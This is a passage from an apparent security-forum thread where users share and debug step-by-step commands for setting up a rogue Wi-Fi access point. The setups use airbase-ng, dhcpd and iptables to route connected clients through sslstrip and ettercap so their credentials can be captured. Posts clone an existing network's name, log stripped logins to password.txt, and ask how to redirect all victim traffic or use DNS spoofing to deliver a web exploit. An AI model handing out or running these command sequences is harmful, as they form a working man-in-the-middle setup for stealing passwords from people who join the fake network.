1) with "MY" dhcpd.conf && with "MY" procedure it WORKED PERFECTLY!!! in my "lan-house-country-provider" ;)
2) with the last one posted I tried but could not connect to the fakeAP

PS: the code is not MINE, I only SHARED my positive test in my LAN after 12345600000000 attempts :o

http://imageshack.us/f/20/8wmd.png/

chopin
2014-02-24, 15:21
Hello everyone, Zimmaro's method works for me, but I wanted to know if you can do DNS spoofing with ettercap so you can try a web exploit... Thanks

tercer_ojo
2014-04-16, 16:43
Hi there. I think my case requires some expertise I don't possess about route/iptables. Let me explain: in my notebook, I have a USB RT3070 wifi card, and the onboard Broadcom wifi card. My intention is to:
1. connect the Broadcom wifi [wlan0] to any hotspot,
2. use the USB Ralink wifi [wlan1] to create a RAP, --> [at0]
3. start a DHCP daemon listening on [at0] to lease addresses,
4. route the traffic from [at0] to [wlan0] to allow normal navigation,
5. attach ettercap + sslstrip to at0.

So far, following zimmaro's approach, I've managed to create the RAP, start the DHCP listening on at0, and ettercap/sslstrip don't complain about anything. However, there's no routing between the test client (Android device) and [wlan0], which in practice means that I cannot navigate from the cellphone, and therefore I can't get any data on ettercap/sslstrip.

THINGS I'VE TRIED:

* every little variation posted in this thread about route and iptables, obviously replacing the internet-facing device with [wlan0], to reflect that I'm not using [eth0] but the connected onboard wifi card.

* DNS is set in dhcpd.conf as 8.8.8.8

I am 80% sure this is about iptables and route. Either I'm allowing traffic through a static route that is not created/not working as intended, or I'm denying traffic through a route well/wrongly created.

I'm gonna stay online waiting & replying. Thanks very much in advance.

seen_bawl
2014-05-25, 05:07
This worked for me, try it

#Open Term1
airmon-ng start wlan1
airbase-ng -e "DumDum" -c 11 -v mon0

#Open Term2
#Install a DHCP for your access point
nano /etc/dhcp3/dhcpd.conf

default-lease-time 700;
max-lease-time 8000;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}


#start your new WifiRouter.
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

#Start your WifiRouters DHCP
echo > '/var/lib/dhcp/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0

#open Term3
#clear any old iptables and nats you might have

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#change directory into the sslstrip directory to make life easier
cd /usr/share/sslstrip/
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 4444
echo "1" > /proc/sys/net/ipv4/ip_forward

#Start SSL Stripper
./sslstrip.py -l 4444 -w password.txt

Noob_4_Life
2014-05-28, 14:28
Hi,
I also want to make a fake access point and got the following problem when I try to follow the instructions above:

############################################
root@kali:~# airmon-ng start wlan1 11


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2355 NetworkManager
2515 wpa_supplicant
2541 dhclient
3149 dhclient
Process with PID 2541 (dhclient) is running on interface wlan0


Interface       Chipset         Driver

mon0            Atheros         ath5k - [phy0]
wlan0           Atheros         ath5k - [phy0]

root@kali:~# airbase-ng -c 11 -e HOME mon0
15:28:41 Created tap interface at0
15:28:41 Trying to set MTU on at0 to 1500
15:28:41 Access Point with BSSID 00:16:44:86:D1:42 started.
Error: Got channel -1, expected a value > 0.
############################################

...and the dhcpd configuration looks like this:

######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################

Anybody any ideas?

(I'm a total noob... I need some clarification, please.)

Dtnoks
2014-06-15, 17:38
Noob_4_Life...first you need to learn HOW TO FIX Airodump-ng fixed channel -1 ...

Nick_the_Greek
2014-06-17, 21:07
> Hi,
> I also want to make a fake access point and got the following problem when I tried to follow the instructions above:
>
> ############################################
> root@kali:~# airmon-ng start wlan1 11
>
>
> Found 4 processes that could cause trouble.
> If airodump-ng, aireplay-ng or airtun-ng stops working after
> a short period of time, you may want to kill (some of) them!
> -e
> PID Name
> 2355 NetworkManager
> 2515 wpa_supplicant
> 2541 dhclient
> 3149 dhclient
> Process with PID 2541 (dhclient) is running on interface wlan0
>
>
> Interface Chipset Driver
>
> mon0 Atheros ath5k - [phy0]
> wlan0 Atheros ath5k - [phy0]
>
> root@kali:~# airbase-ng -c 11 -e HOME mon0
> 15:28:41 Created tap interface at0
> 15:28:41 Trying to set MTU on at0 to 1500
> 15:28:41 Access Point with BSSID 00:16:44:86:D1:42 started.
> Error: Got channel -1, expected a value > 0.
> ############################################
>
> ...and the dhcpd configuration looks like this:
>
> ######################################
> authoritative;
>
> default-lease-time 700;
> max-lease-time 8000;
>
> subnet 10.0.0.0 netmask 255.255.255.0 {
> option routers 10.0.0.1;
> option subnet-mask 255.255.255.0;
>
> option domain-name "HOME";
> option domain-name-servers 10.0.0.1;
>
> range 10.0.0.30 10.0.0.60;
>
> }
> ##############################################
>
> Anybody any ideas?
>
> (I'm a total noob... I need some clarification, please.)

As far as I can see, you use an ath5k-based wifi card. Since airbase-ng-based fake APs are extremely slow, you can try to create a master-mode-based fake AP. To do so, you must install the discontinued madwifi-ng drivers, but they are a little buggy and you can harm your Kali installation. If you're willing to do it, you can try this:

apt-get update
git clone https://github.com/proski/madwifi madwifi-ng
apt-get install -y linux-headers-"`uname -r`"
apt-get install build-essential libssl-dev
# Let's patch it for injection
wget http://patches.aircrack-ng.org/madwifi-ng-r4073.patch
patch -N -p 0 -i madwifi-ng-r4073.patch
# Let's "unload" our current driver
modprobe -r ath5k
modprobe -r ath
echo "blacklist ath9k" >> /etc/modprobe.d/kali-blacklist.conf
echo "blacklist ath5k" >> /etc/modprobe.d/kali-blacklist.conf
echo "blacklist ath" >> /etc/modprobe.d/kali-blacklist.conf
modprobe ath_pci autocreate=none
wlanconfig ath0 create wlandev wifi0 wlanmode ap

and you have a master-mode-based fake AP! After that you can change your ESSID, channel, etc. with:

iwconfig ath0 essid youressid
iwconfig ath0 channel yourchannel

Finally, I must note that if you want to go back to ath5k you must unload the ath_pci driver, remove the ath5k, ath9k and ath modules from the blacklist in kali-blacklist.conf and load the ath5k driver again.

TheFedex
2014-08-27, 11:09
Hi everyone, first of all sorry for my bad English, but it isn't my first language.
I followed a lot of guides, but I can't get this fake AP working. I also followed Zimmaro's guide, but without results. I can create the AP and I can connect to the AP (from Windows I also get the message "connected to Internet"), but when I try to browse I can't. It seems I can ping an address like 8.8.8.8 (not always; in some tests it doesn't work), but if I try to ping www.google.com I can't (only in some tests it worked). From another client I can't ping anything (only in some tests it worked). It seems as if the connection is really slow or unstable (I also see the Skype icon on the client connected to the fake AP: for a few moments it is connected, but after some seconds it says "In connection..." again). Please, could someone help me? These are the instructions I use:

my GW is: 192.168.1.254


airmon-ng start wlan0 11
airbase-ng -c 11 -e WIFI_TEST444555 mon0
ifconfig at0 192.168.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start


sslstrip -f -p -k 10000


ettercap -p -u -T -q -i at0

dhcpd.conf

authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 192.168.0.0 netmask 255.255.255.0 {
option routers 192.168.0.1;
option subnet-mask 255.255.255.0;

option domain-name "FREE_WIFI444555";
option domain-name-servers 192.168.0.1;


range 192.168.0.30 192.168.0.60;

}

chestor
2014-10-05, 12:07
When I do it like Zimmaro, after the command
airbase-ng -c 11 -e wifi mon0
it says "Error: Got channel -1, expected value > 0"
and even if I choose another channel it still says the same.
Sorry for my English.

Nick_the_Greek
2014-10-06, 18:14
> When I do it like Zimmaro, after the command
> airbase-ng -c 11 -e wifi mon0
> it says "Error: Got channel -1, expected value > 0"
> and even if I choose another channel it still says the same.
> Sorry for my English.

Hi there chestor!
You can try my script
Aerial - How to E-Z Setup a Multi-mode wireless LAN Based on a Software Access point (https://forums.kali.org/showthread.php?23028-Aerial-Multi-mode-wireless-LAN-Based-on-a-Software-Access-point )
and select mode 6:

6. MiTM - Transparent SSLstriped WLAN (Sslstrip).
You will be able to set up a transparent sslstripped wireless LAN very easily with airbase-ng or hostapd.
It's almost the same as zimmaro's approach.

testerchat
2014-10-17, 18:18
Hello, I am trying to set up a fake 2.4 GHz wifi AP. I use the Alfa AWUS036H adapter, which is connected to a wifi network with ESSID: freewifi. Can I create a fake access point with the same ESSID (freewifi) and share the internet through it (so that my adapter stays connected to that AP and does not reconnect to the AP I created)? Can I take one wifi interface and immediately share the internet from it? Below I show how I try to implement it.

Gateway in the network from which I take the internet : 192.168.2.1
Operating System: kali-linux 1.0.9a-i386

1. Is the logic of my example correct?

2. On the Internet I could not find examples of creating a fake AP where one wifi interface is used both to connect to the internet and to create the fake AP.

3. Why does my card not connect to the wifi network and not receive settings via DHCP? (I also tried the integrated adapter, but the result is the same.) They write that the problem may be in the driver... but why I cannot connect with the built-in adapter either, I do not understand...



iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 essid "freewifi" ap 01:00:00:00:00:00 #connection to AP by ESSID and BSSID
dhclient -v wlan1
apt-get install isc-dhcp-server
nano /etc/dhcpd.conf
######
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
######
airmon-ng start wlan1 11
airbase-ng mon0 -c 7 --essid "freewifi" #creation of FAKE AP with the same ESSID
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
###### ####
root@hk3r:~# sslstrip -f -p -k 8080
######
root@hk3r:~# ettercap -p -u -T -q -i at0
######

Additional Information:

root@kali:~# iptables -L -n
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

root@kali:~# dhclient -v wlan1
Internet Systems Consortium DHCP Client 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan1/MYADAPTERMAC
Sending on LPF/wlan1/MYADAPTERMAC
Sending on Socket/fallback
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 7
No DHCPOFFERS received.
No working leases in persistent database - sleeping.

root@kali:~# tcpdump -i wlan1 port 67 or port 68 -e -n
clear....

I would be very glad of any help.

myn
2014-11-22, 07:28
Hi, I have some trouble with DNS.
My configuration is:

wlan0 is the default interface for access to the LAN and internet
wlan1 is the Alfa wireless adapter for the fake AP

The ifconfig output is:
eth0 Link encap:Ethernet HWaddr 00:1c:25:95:70:18
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Memory:fc600000-fc620000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19773 (19.3 KiB) TX bytes:19773 (19.3 KiB)

wlan0 Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:297 errors:0 dropped:0 overruns:0 frame:0
TX packets:23 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22659 (22.1 KiB) TX bytes:2453 (2.3 KiB)

wlan1 Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

then route -n is:

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 wlan0
172.16.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan0

now my commands are:

apt-get install dhcp3-server
gedit /etc/dhcpd.conf

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 172.16.77.0 netmask 255.255.255.0 {
option routers 172.16.77.254;
option subnet-mask 255.255.255.0;
option domain-name "wifiFREE";
option domain-name-servers 172.16.77.254;
range 172.16.77.2 172.16.77.20;
}

airmon-ng
airmon-ng start wlan1
airbase-ng -c 11 -e wifiFREE mon0

ifconfig at0 172.16.77.254 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
sslstrip -l 8080

ettercap -p -u -T -q -i at0

Then I take my iPad and connect to wifiFREE without any trouble.
IP addresses are assigned correctly, and if I ping 8.8.8.8 from the iPad with Fing it responds correctly.
But if I try to open google.com or any other website from Safari on the iPad, after some seconds, when the browser has tried unsuccessfully to load the page, I can't display websites.
If I try with the IP address instead, I can view websites.
This is strange because even setting

option domain-name-servers 172.16.77.254, 8.8.8.8;

I have the same situation.

Does anyone have an idea how to solve this strange trouble?
TIA

myn
2014-11-22, 10:16
Is it possible that it's due to my network firewall, a Cisco ASA? It's strange because in my grandparents' network it works fine.

quiqueb
2015-02-20, 00:27
Hi, I have done every step like you do, but on the "victim" machine, when I connect to the fake access point, it says that there is no internet access. I don't know what to do to change that; could anyone help me?

Manolo
2015-04-22, 19:36
Hello, Zimmaro

I follow your steps and I can connect to the fake wifi and get an IP via DHCP, but can't navigate to the internet; it appears to be a problem with DNS, because the browser keeps trying and trying...

I do the test with 2 WLANs: wlan0 = interface connected to the internet, wlan1 = fake (USB)

When I create the fake SSID with # airbase-ng -c 11 -e HOME mon0 I get this output:

16:35:05 Created tap interface at0
16:35:05 Trying to set MTU on at0 to 1500
16:35:05 Trying to set MTU on mon0 to 1800
16:35:05 Access Point with BSSID 38:B1:DB:CD:26:35 started.
Error: Got channel -1, expected a value > 0.


Can you help me?

Thank you!

zimmaro
2015-04-23, 08:02
> Hello, Zimmaro
>
> I follow your steps and I can connect to the fake wifi and get an IP via DHCP, but can't navigate to the internet; it appears to be a problem with DNS, because the browser keeps trying and trying...
>
> I do the test with 2 WLANs: wlan0 = interface connected to the internet, wlan1 = fake (USB)
>
> When I create the fake SSID with # airbase-ng -c 11 -e HOME mon0 I get this output:
>
> 16:35:05 Created tap interface at0
> 16:35:05 Trying to set MTU on at0 to 1500
> 16:35:05 Trying to set MTU on mon0 to 1800
> 16:35:05 Access Point with BSSID 38:B1:DB:CD:26:35 started.
> Error: Got channel -1, expected a value > 0.
>
>
> Can you help me?
>
> Thank you!

hi :-)
-for error -1 try to use airmon-zc to put the ""fake-usb-device"" in monitor mode
http://postimg.org/image/4e8na9zq7/
-for a correct fake_AP ..my procedure is TOO OLD (for old kali versions && old victim browsers/updated systems); now I don't have time to RE-TEST it on the new kali 1.1.0a ..USE the PLUS-GREAT script Aerial.sh by Nick_The_Greek (works fine && has many options)
bye

Farenheit451
2016-04-29, 16:54
Hi,

I know this thread is a bit old, but I would just like to say this tutorial has worked perfectly for me!

One quick question: I want to modify the iptables rules so that all traffic will be redirected to my machine (so, for instance, if they type in google.com they'll be redirected to the IP of my machine, 192.168.1.4).

What set of iptables rules should I have in order to achieve this?

Thanks!